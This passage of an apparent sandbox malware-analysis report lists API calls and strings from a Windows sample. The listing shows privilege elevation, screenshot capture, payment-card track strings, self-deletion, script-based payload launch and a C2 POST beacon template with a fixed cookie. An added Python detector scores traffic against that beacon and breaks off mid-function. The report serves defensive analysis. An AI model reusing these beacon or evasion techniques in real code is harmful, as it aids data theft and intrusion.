• recv.WS2_32(00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00407F38,00000000,00000000), ref: 004072C3
• recv.WS2_32(?,?,00000400,00000000), ref: 0040732E
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: recv$AllocVirtual
• String ID:
• API String ID: 2370969716-0
• Opcode ID: 3a51e633106f484ece2fcd3ca808fba01e84403f4fbbe61aa3821a41c2b79207
• Instruction ID: db8cd6ebcdcc9337e0ce1156ce8be60a7b34194076e82308930da628e4c4106b
• Opcode Fuzzy Hash: 3a51e633106f484ece2fcd3ca808fba01e84403f4fbbe61aa3821a41c2b79207
• Instruction Fuzzy Hash: 7331F772D08205BEFB315BB5CC80A5E7BA59F84314F25807BED04F62D1EA38E941E65A
APIs
  • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
• SetErrorMode.KERNELBASE(C8D54834,?,?,00000000), ref: 004055B7
                                                                                                                                                                                                                                                                                              • Part of subcall function 004074BF: LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,?,?,?,?,?,?,004055BE,?,?,00000000), ref: 00407510
                                                                                                                                                                                                                                                                                              • Part of subcall function 004074BF: AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 00407543
                                                                                                                                                                                                                                                                                            • _beginthreadex.MSVCRT ref: 00405629
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AdjustErrorLibraryLoadLookupModePrivilegePrivilegesTokenValue_beginthreadex
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 595208359-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ca24d91df4eef7d9672899915baa7d20e6e513fcf5e6c82319b162c42e7174ae
                                                                                                                                                                                                                                                                                            • Instruction ID: d84fbb3d75e8cf0f967d0c5e31a60ca7cce9eb9b614bd4d222c19c8a6ddae697
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca24d91df4eef7d9672899915baa7d20e6e513fcf5e6c82319b162c42e7174ae
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5511A7315047412BD32077B6DC59E7B7698DFC1720F100A3FB5E6E61C1EE7C894585AA
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00407286: recv.WS2_32(00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00407F38,00000000,00000000), ref: 004072C3
                                                                                                                                                                                                                                                                                              • Part of subcall function 00407286: recv.WS2_32(?,?,00000400,00000000), ref: 0040732E
                                                                                                                                                                                                                                                                                            • closesocket.WS2_32(00000000,?,?,00000000,00407F38,00000000,00000000), ref: 004073FA
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: recv$closesocket
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4196379120-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 49687872994e1b20c67728f4252d28e076a44b58eaf92a073bae059d876c6b26
                                                                                                                                                                                                                                                                                            • Instruction ID: 99e77747aa5181a8cf159a99dd79525f8e184ed58c29ea420a7589f6c073a402
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49687872994e1b20c67728f4252d28e076a44b58eaf92a073bae059d876c6b26
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C0188329082156FEF11AE65EC02A9F37949F41754F10013AFD01F62C2EA78AE11D2AA
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DnsQuery_A.DNSAPI(00000000,00000001,00000100,00000000,00000000,00000000,?,?,0040833E,0040C698,00000000,00000104,00000000,00000000,00000000), ref: 0040826C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Query_
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 428220571-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 43233cfc2d3cf2fd5984d9f0b6e5559adad4a0a228ac07ca0c817f7ad6d61cd0
                                                                                                                                                                                                                                                                                            • Instruction ID: 5c7bea5c504106bdbca3c99cf92aa18e666d6d3997db29912fea7ae9729bbba8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43233cfc2d3cf2fd5984d9f0b6e5559adad4a0a228ac07ca0c817f7ad6d61cd0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0F0F4327002017AEA209759EC06FABB359CB85F50F10056EF981FF2C0DEF4ED418198
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00407DFB,000000FF,00000000,00000000,00000000,00000000,753C73E0,00000206,00000000,?,?,00407DFB,?), ref: 004064E9
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocByteCharMultiVirtualWide
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1277181490-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d1456055df678da3754626ec683021799b227b979ab447f4b929fba41e1d1778
                                                                                                                                                                                                                                                                                            • Instruction ID: 3f7d88b5208c627646c50de5bde980f2e45d9f368264ffd58a8ec27b99098767
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1456055df678da3754626ec683021799b227b979ab447f4b929fba41e1d1778
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1F0C2B6508219BFAB119AF5DCC5CBF7AACDA462B8321023AF521A2280D5359D005270
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000001,004099F4,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,0040855B,Software\Z0BAZwxx\,00000000,?,?,004099F4), ref: 004010CA
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f20f2ddb427b5351f11daf537abb747c4f1df89915f5cad5abea8d208865d939
                                                                                                                                                                                                                                                                                            • Instruction ID: b84a4d7f944386b7a6a5ec655b84d4ed03378f31deb8c07fdd86a349c91a327b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f20f2ddb427b5351f11daf537abb747c4f1df89915f5cad5abea8d208865d939
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0D092B61642097EFA1D1BD1DC1BEBA360DC700660F10421EB70969486A8E2B96091A8
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • send.WS2_32(00000000,00407F38,?,00000000,?,004073C2,00000000,?,00000000,00000000), ref: 004071D8
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: send
APIs
• socket.WS2_32(00000002,00000001,00000006,004071EE,00000000,00408E7E,?,00407F38,00000000,00000000), ref: 004010E2
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: socket
APIs
• VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
Similarity
• API ID: AllocVirtual
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,004079DA,8EB39475,?,?,?), ref: 00404C34
Similarity
• API ID: AllocVirtual
APIs
• VirtualFree.KERNELBASE(00000000,00000000,3A9ACC72,?,00403009,?,00000000,--->,00000000,0040C8B0), ref: 00401084
Similarity
• API ID: FreeVirtual
APIs
• CloseHandle.KERNELBASE(?,?,0040754D,00000000), ref: 0040104C
Similarity
• API ID: CloseHandle
APIs
• GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040903B
• GetSystemMetrics.USER32(00000000), ref: 00409048
• GetSystemMetrics.USER32(00000001), ref: 0040904F
• CreateCompatibleDC.GDI32(00000000), ref: 00409055
• GetDC.USER32(00000000), ref: 0040906B
• CreateCompatibleBitmap.GDI32(00000000), ref: 0040906E
• SelectObject.GDI32(?,00000000), ref: 0040907B
• GetDC.USER32(00000000), ref: 00409089
• BitBlt.GDI32(?,00000000,00000000,?,?,00000000), ref: 00409097
  • Part of subcall function 00408F76: GetModuleHandleW.KERNEL32(GdiPlus.dll,GdipCreateBitmapFromHBITMAP), ref: 00408F9B
  • Part of subcall function 00408F76: GetProcAddress.KERNEL32(00000000), ref: 00408FA4
• DeleteObject.GDI32(?), ref: 004090AD
• GdiplusShutdown.GDIPLUS(?), ref: 004090B6
Similarity
• API ID: CompatibleCreateGdiplusMetricsObjectSystem$AddressBitmapDeleteHandleModuleProcSelectShutdownStartup
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0040136D
• Thread32First.KERNEL32(00000000,?), ref: 0040138B
• GetCurrentProcessId.KERNEL32 ref: 0040139C
• GetCurrentThreadId.KERNEL32 ref: 004013A7
• HeapAlloc.KERNEL32(?,00000200), ref: 004013CB
• Thread32Next.KERNEL32(?,00000010), ref: 00401416
• CloseHandle.KERNEL32(?,?,?), ref: 00401427
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: CurrentThread32$AllocCloseCreateFirstHandleHeapNextProcessSnapshotThreadToolhelp32
• String ID:
• API String ID: 1603055512-0
• Opcode ID: af1bdede72f19ddb88b9d4dd44391aa6c563041bf97d6c8c9605e24efd9b8436
• Instruction ID: a46b4483c7b8a11f0172a98b4f0046a6093f5fbd21dcca2acf5bbb94b3727895
• Opcode Fuzzy Hash: af1bdede72f19ddb88b9d4dd44391aa6c563041bf97d6c8c9605e24efd9b8436
• Instruction Fuzzy Hash: B4213D70500205DFEB208FA4DD89AAAB7B5FB04305F10863EE556F26F0D7749841CB28

APIs
  • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
• wsprintfW.USER32 ref: 0040A44F
• wsprintfW.USER32 ref: 0040A465
• wsprintfW.USER32 ref: 0040A502
• wsprintfW.USER32 ref: 0040A529
• _wcsicmp.MSVCRT ref: 0040A550
• wsprintfW.USER32 ref: 0040A566
• _wcsicmp.MSVCRT ref: 0040A57F
• _endthreadex.MSVCRT(00000000), ref: 0040A5E3
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: wsprintf$_wcsicmp$AllocVirtual_endthreadex
• String ID: %ls\%d%d.%ls$%ls\%d%d.exe$%s %S$/s %s$dll$exec&%S$regsvr32$vbs$wscript
• API String ID: 1107127829-2164475476
• Opcode ID: 3bb7dd00f52e421adf8aa78cbce0d07f9c473fe1d7ebe579c55aee274f382f72
• Instruction ID: b481ad22742ac5d54984b1c6fda5b09a00c60f1e46715cb6cdbbe7297d3e5299
• Opcode Fuzzy Hash: 3bb7dd00f52e421adf8aa78cbce0d07f9c473fe1d7ebe579c55aee274f382f72
• Instruction Fuzzy Hash: 5F51B032548304AFD701BF25EC02A6F7B95EF84315F10893FF984B61D2DA7A89158B9B

Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: wcscpy$wcscat
• String ID: %20(32-bit)$%20(64-bit)$N/A$Windows%2010$Windows%202000$Windows%202003$Windows%207$Windows%208$Windows%208.1$Windows%20NT$Windows%20Vista$Windows%20XP
• API String ID: 1648490730-201823473
• Opcode ID: db90e47feef2e945943bc22b84149409bc0b9ed49b1f49d46305809d478a1a78
• Instruction ID: d6871911b6e28be7e670e754a52c19a4fe27a3756fb0170673ef9cef492ad0b8
• Opcode Fuzzy Hash: db90e47feef2e945943bc22b84149409bc0b9ed49b1f49d46305809d478a1a78
• Instruction Fuzzy Hash: C2317433E48208D6DF24E754D98ABE97264A711754F2086B7E506B22C0D67CFE85CA8F

Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: memset
• String ID: ;$?$?$P$Track1$Track2
• API String ID: 2221118986-1157550184
• Opcode ID: 168034bfa4ee5d13975dbda2c5989fd9011b117aa1260e9c9f5f99c70a7a6302
• Instruction ID: e96c9378b95773dee0a483c2d7e6947cd4ab51d7628724ba882f998f2e0c0245
• Opcode Fuzzy Hash: 168034bfa4ee5d13975dbda2c5989fd9011b117aa1260e9c9f5f99c70a7a6302
• Instruction Fuzzy Hash: 41C12671C00248AEEF119AB48E4CBEE7B68EF55354F24417BE844762C1D7BC4B868769

APIs
• memset.MSVCRT ref: 0040AB0D
• memset.MSVCRT ref: 0040AB2D
• memset.MSVCRT ref: 0040AB49
  • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
• memset.MSVCRT ref: 0040AB9F
• wsprintfW.USER32 ref: 0040ABE1
• GetCurrentProcess.KERNEL32(?,?,%s /c del %s,?,?), ref: 0040AC12
  • Part of subcall function 0040AA73: memset.MSVCRT ref: 0040AA94
  • Part of subcall function 0040AA73: memset.MSVCRT ref: 0040AAAB
  • Part of subcall function 0040AA73: wsprintfW.USER32 ref: 0040AACF
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: memset$wsprintf$CurrentLibraryLoadProcess
• String ID: %s /c del %s$COMSPEC$D
• API String ID: 277931332-2460376804
• Opcode ID: ee50f0230a7024b79151c7fca479acf4555080f5941d415d608127d23faa52fc
• Instruction ID: 9a000a42536d7a745db068e817f025c7df3bec6bdb1ac414e77931bb60ab556d
• Opcode Fuzzy Hash: ee50f0230a7024b79151c7fca479acf4555080f5941d415d608127d23faa52fc
• Instruction Fuzzy Hash: D541A9B25043406BD320EBB6DC49DAF779CDF84714F00093EB699E6181DA78DA09C7A6

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040482C
                                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040486E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406EFB: LoadLibraryW.KERNELBASE(kernel32.dll,00000000,0ABF23CD,?,?,00000000), ref: 00406F81
                                                                                                                                                                                                                                                                                            • wcsstr.MSVCRT ref: 004048B8
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004048D6
                                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 0040493F
                                                                                                                                                                                                                                                                                            • _endthreadex.MSVCRT(00000000), ref: 00404980
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memsetwsprintf$AllocLibraryLoadVirtual_endthreadexwcsstr
                                                                                                                                                                                                                                                                                            • String ID: %ls %ls$log&%ls&%ls&p&%ls
                                                                                                                                                                                                                                                                                            • API String ID: 358198565-3976585153
                                                                                                                                                                                                                                                                                            • Opcode ID: 1f8776c272fb005b4c6e051bb7459ca1da05a0c4f706097a2d8896626758e320
                                                                                                                                                                                                                                                                                            • Instruction ID: 5b204e8dd206c5cf91682a8e6da0635c17dfc8515db03ed3d213893d12788448
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f8776c272fb005b4c6e051bb7459ca1da05a0c4f706097a2d8896626758e320
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3541F8B2900108BAEB11BBB1DD46FEF7768EF80304F10057FF604B61C2EA7D5A454659
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(GdiPlus.dll,GdipCreateBitmapFromHBITMAP), ref: 00408F9B
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00408FA4
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(GdiPlus.dll,GdipSaveImageToFile), ref: 00408FB7
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00408FBA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                            • String ID: 2$GdiPlus.dll$GdipCreateBitmapFromHBITMAP$GdipSaveImageToFile
                                                                                                                                                                                                                                                                                            • API String ID: 1646373207-199102230
                                                                                                                                                                                                                                                                                            • Opcode ID: 3ca8e2c1e255ed1e8f7765633dfa9f114379a59cb46518c24592d80fd588fbc7
                                                                                                                                                                                                                                                                                            • Instruction ID: 589fc684528d22baab4eb2ee89da4a59c0b32a3b3ae3daf64a8cf6386668b0ad
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ca8e2c1e255ed1e8f7765633dfa9f114379a59cb46518c24592d80fd588fbc7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D1119B1D00219EACB119FE5CD84ADEBBBDBF48354F10417BE914F2290D7789A098B64
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,00000000,00404AD6,00000000,-00000004,00000000,00000000,-00000004,00000104,?,00404AD6,00000000,-00000004,?), ref: 00409ED6
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,sprintf), ref: 00409EEC
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • sprintf, xrefs: 00409EE6
                                                                                                                                                                                                                                                                                            • _wv=%s, xrefs: 0040A039
                                                                                                                                                                                                                                                                                            • POST %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-type: application/x-www-form-urlencodedCookie: auth=bc00595440e801f8a5d2a2ad13b9791bContent-length: %i%s, xrefs: 0040A06A
                                                                                                                                                                                                                                                                                            • ntdll.dll, xrefs: 00409ED1
                                                                                                                                                                                                                                                                                            • ff&%ls&%ls&%s&%s&%i, xrefs: 00409FED
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressAllocHandleModuleProcVirtual
                                                                                                                                                                                                                                                                                            • String ID: POST %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-type: application/x-www-form-urlencodedCookie: auth=bc00595440e801f8a5d2a2ad13b9791bContent-length: %i%s$_wv=%s$ff&%ls&%ls&%s&%s&%i$ntdll.dll$sprintf
                                                                                                                                                                                                                                                                                            • API String ID: 3695083113-3352186294
                                                                                                                                                                                                                                                                                            • Opcode ID: 2e06a92000f3f459d28d1244bb7f8cd70b03360f78f6139414a1c17f2dadd28e
                                                                                                                                                                                                                                                                                            • Instruction ID: 60402d10bb5f95850af81384687696959107d19452cb3fe7a62df9f1c819f059
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e06a92000f3f459d28d1244bb7f8cd70b03360f78f6139414a1c17f2dadd28e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D51C6B1C04218AAEF017FB1DD468EFBBB9AF54305B11403FF900B21D2DB7E4A158A69
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00409BB2
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,sprintf), ref: 00409BC8
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • sprintf, xrefs: 00409BC2
                                                                                                                                                                                                                                                                                            • _wv=%s, xrefs: 00409CF0
                                                                                                                                                                                                                                                                                            • plugin&%ls&%ls&%s&%s, xrefs: 00409CA3
                                                                                                                                                                                                                                                                                            • POST %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-type: application/x-www-form-urlencodedCookie: auth=bc00595440e801f8a5d2a2ad13b9791bContent-length: %i%s, xrefs: 00409D21
                                                                                                                                                                                                                                                                                            • ntdll.dll, xrefs: 00409BAD
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressAllocHandleModuleProcVirtual
                                                                                                                                                                                                                                                                                            • String ID: POST %s HTTP/1.0Host: %sUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0Content-type: application/x-www-form-urlencodedCookie: auth=bc00595440e801f8a5d2a2ad13b9791bContent-length: %i%s$_wv=%s$ntdll.dll$plugin&%ls&%ls&%s&%s$sprintf
                                                                                                                                                                                                                                                                                            • API String ID: 3695083113-595867970
                                                                                                                                                                                                                                                                                            • Opcode ID: 2a0336903ed28a33660f9da3f3c99a21c4a7ae50ce80402e0d43ec7b37675c82
                                                                                                                                                                                                                                                                                            • Instruction ID: 087c7b39e7903d605c7e5286878b6e50816404ce0fe47a3c9abd54429710ce82
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a0336903ed28a33660f9da3f3c99a21c4a7ae50ce80402e0d43ec7b37675c82
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F51B5B2C44218BEEF057BB1DD4A8FEBBB8EE44315B10403FF500B61C2DA7D5A418A68
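The two functions above (refs 0040A06A and 00409D21) build the sample's HTTP beacon from a fixed template: a POST using HTTP/1.0, a hard-coded Firefox user agent, a constant `Cookie: auth=...` value, a non-canonical `Content-length` header and a form body whose value is formatted with `_wv=%s`; the `ff&...` and `plugin&...` strings are the record formats the functions assemble (the line separators of the template were lost in extraction; real requests carry CRLF). Those constants are a usable network fingerprint. The script below is an added detection example written for this report, not Joe Sandbox or sample code: it parses raw HTTP requests and scores them against the literals shown above. Host names, URL paths and the body contents of the two sample requests are constructed; whether the `_wv=` value carries the `ff&`/`plugin&`/`log&` record in the clear is not shown on this page and is only assumed for the constructed beacon sample.

```python
"""Score raw HTTP requests against the beacon template from the report above.

Added example for this report; not Joe Sandbox or sample code. Sample
requests, host names and body values are constructed for illustration.
"""
import re

# Literal values taken from the strings at 0040A06A / 00409D21.
BEACON_UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) "
             "Gecko/20100101 Firefox/38.0")
BEACON_COOKIE = "auth=bc00595440e801f8a5d2a2ad13b9791b"
BODY_PREFIX = b"_wv="
# Record tags from the format strings "ff&...", "plugin&..." and "log&...".
# Assumption: the record may appear in clear text after "_wv=".
RECORD_TAG_RE = re.compile(rb"^(ff|plugin|log)&")


def parse_request(raw: bytes):
    """Split a raw request into (request line, headers, body) or None.

    headers maps the lower-cased header name to (original name, value) so
    that the non-canonical "Content-length" spelling can still be checked.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.split(b"\r\n")
    request_line = lines[0].decode("latin-1")
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon:
            return None
        orig = name.decode("latin-1").strip()
        headers[orig.lower()] = (orig, value.decode("latin-1").strip())
    return request_line, headers, body


def score_request(raw: bytes) -> list:
    """Return the list of beacon indicators matched by one request."""
    parsed = parse_request(raw)
    if parsed is None:
        return []
    request_line, headers, body = parsed
    hits = []
    parts = request_line.split(" ")
    if len(parts) == 3 and parts[0] == "POST" and parts[2] == "HTTP/1.0":
        hits.append("POST with HTTP/1.0")
    if headers.get("user-agent", ("", ""))[1] == BEACON_UA:
        hits.append("hard-coded User-Agent")
    if headers.get("cookie", ("", ""))[1] == BEACON_COOKIE:
        hits.append("fixed auth cookie")
    cl = headers.get("content-length")
    if cl is not None and cl[0] == "Content-length":
        hits.append("non-canonical Content-length header")
    if body.startswith(BODY_PREFIX):
        hits.append("_wv= body")
        if RECORD_TAG_RE.match(body[len(BODY_PREFIX):]):
            hits.append("plaintext record tag")
    return hits


def is_beacon(raw: bytes, threshold: int = 3) -> bool:
    """Flag a request once enough independent indicators line up."""
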